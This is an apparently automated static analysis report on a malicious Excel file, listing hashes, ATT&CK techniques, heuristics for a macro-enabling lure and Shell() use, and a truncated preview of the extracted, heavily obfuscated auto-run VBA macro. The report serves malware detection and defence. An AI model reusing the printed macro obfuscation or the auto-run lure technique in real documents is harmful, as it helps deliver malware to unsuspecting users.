Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f81f5483bbdd78d…

MALICIOUS

Office (OLE)

Size: 762.0 KB | Created: 2017-08-03 19:31:19 | Authoring application: Microsoft Excel | First seen: 2018-09-04
MD5: 6d0fade2ea426fdc53bfcb5e875fa29c
SHA-1: 346258cb2fef626a87ea35de78cd2f5bb3e3e4f8
SHA-256: 2f81f5483bbdd78d3f6c23ea164830ae263993f349842dd1d1e6e6d055822720
Risk Score: 208

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic

The sample is an Excel file containing a Workbook_Open VBA macro that calls the Shell() function, indicating it is designed to execute external commands. The document body explicitly prompts the user to 'enable macros for proper view!', a common social engineering tactic. The VBA code is heavily obfuscated, but the presence of Shell() together with the lure strongly suggests it acts as a downloader for a second-stage payload.

Heuristics (6)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • OLE_VBA_MACROS (medium, 3 related findings): Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_WBOPEN (high): Workbook_Open macro
  • OLE_VBA_ENVIRON (low): Environ() call (env variable access)
  • SE_ENABLE_LURE (medium): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source)
  Size: 103999 bytes
  SHA-256: 872bbb859d8e808568d0241913f3cc374415f64cf972e66c7d99a2e49c62dd56

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRkboOK_opeN(): Call HjQtJEpdADlaPJh: End Sub
Function HjQtJEpdADlaPJh() As Currency
Call fAoPHggxuVQpqfE
End Function
Private Function fAoPHggxuVQpqfE() As Long
Call hxXtPeuinsXPNfn
End Function
Private Sub hxXtPeuinsXPNfn()
Call UbntGrmagISFqyD
End Sub
Static Function UbntGrmagISFqyD() As Boolean
Call lmOAHaCjacpGQvf
End Function
Function lmOAHaCjacpGQvf() As Integer
Call MnFxiABbJyqUIfW
End Function
Private Function MnFxiABbJyqUIfW() As Currency
Call sLZicUTHDPdxkZq
End Function
Private Function sLZicUTHDPdxkZq() As Boolean
Call iZJJweUXmivlfGZ
End Function
Static Function iZJJweUXmivlfGZ() As Single
Call PpNIFwQpACtnQid
End Function
Sub PpNIFwQpACtnQid()
Call GwgwoFvqEWWBUvw
End Sub
Private Sub GwgwoFvqEWWBUvw()
Call oETIMXVunqfcODk
End Sub
Static Function oETIMXVunqfcODk() As Currency
Call vXfZnQBTrJYSVPv
End Function
Sub vXfZnQBTrJYSVPv()
Call fXCzZhGJvesSXDS
End Sub
Sub fXCzZhGJvesSXDS()
Call mjxeQZQUUywgnvO
End Sub
Private Function mjxeQZQUUywgnvO() As Single
Call UnulpRzGhnGuHKK
End Function
Static Function UnulpRzGhnGuHKK() As Date
Call HuXlsfCJBhZOgVo
End Function
Sub HuXlsfCJBhZOgVo()
Call BIxzskfXUbAwGFN
End Sub
Function BIxzskfXUbAwGFN() As Date
Call WSOvZPYfyVhrLFf
End Function
Private Sub WSOvZPYfyVhrLFf()
Call zjcFCmrycNVARds
End Sub
Static Function zjcFCmrycNVARds() As String
Call CvhxNjZKRHQVBSy
End Function
Sub CvhxNjZKRHQVBSy()
Call NOjCUYiiFASEmgz
End Sub
Sub NOjCUYiiFASEmgz()
Call zddpImHzDtazCKt
End Sub
Private Function zddpImHzDtazCKt() As Variant
Call eeKaPHiqXolGawa
End Function
Static Sub eeKaPHiqXolGawa()
Call ywrIhnxLghGbWQI
End Sub
Sub ywrIhnxLghGbWQI()
Call ZUVFwMmtpZjLTIm
End Sub
Sub ZUVFwMmtpZjLTIm()
Call NTiTOYTheUOEBzz
End Sub
Private Sub NTiTOYTheUOEBzz()
Call XuALGOyTxLFOdgR
End Sub
Static Sub XuALGOyTxLFOdgR()
Call twBUCsUMwHwirNS
End Sub
Sub twBUCsUMwHwirNS()
Call XFzsuOSRvBwQFSP
End Sub
Function XFzsuOSRvBwQFSP()
Call qfxNxvCBjsGMsFN
End Function
Static Function qfxNxvCBjsGMsFN() As Variant
Call CqigTjpLsmUUnzy
End Function
Sub CqigTjpLsmUUnzy()
Call pxLgWwsOLhnoMKc
End Sub
Sub pxLgWwsOLhnoMKc()
Call jLlvWCVcfaOXmuB
End Sub
Function jLlvWCVcfaOXmuB() As Double
Call FVCrDhOjJUuRquT
End Function
Static Sub FVCrDhOjJUuRquT()
Call hlQBgEhDnNjawSg
End Sub
Static Function hlQBgEhDnNjawSg() As Object
Call lyVsqBPPbHdvhIm
End Function
Function lyVsqBPPbHdvhIm() As Long
Call vRXyxqYnPzfeSVo
End Function
Private Sub vRXyxqYnPzfeSVo()
Call hgRlmExEOsnZiAh
End Sub
Private Function hgRlmExEOsnZiAh() As Object
Call MhyWtZYuhoygGmO
End Function
Static Function MhyWtZYuhoygGmO() As Double
Call gyfELFnQqgUCBFw
End Function
Sub gyfELFnQqgUCBFw()
Call uCAlwsEMVcsjFgR
End Sub
Private Function uCAlwsEMVcsjFgR() As Double
Call wWWOrqImoUbfgon
End Function
Private Sub wWWOrqImoUbfgon()
Call rcgrGuQmcPNmPFw
End Sub
Static Sub rcgrGuQmcPNmPFw()
Call czpQfKKRGGKIWCG
End Sub
Static Sub czpQfKKRGGKIWCG()
Call GInoXgIWFBKqlHD
End Sub
Private Function GInoXgIWFBKqlHD() As Single
Call YhlIbNsGtsUmYuB
End Function
Private Function YhlIbNsGtsUmYuB() As Single
Call ksWcxBfQCmhuSpn
End Function
Static Sub ksWcxBfQCmhuSpn()
Call XAzcAOiSWgAPrzQ
End Sub
Function XAzcAOiSWgAPrzQ() As Integer
Call SNZrzULhpabxRjp
End Function
Private Sub SNZrzULhpabxRjp()
Call nXqmgzDoTUIsWjH
End Sub
Private Sub nXqmgzDoTUIsWjH()
Call ypkhsNUfEXOnTXA
End Sub
Private Sub yp
... (truncated)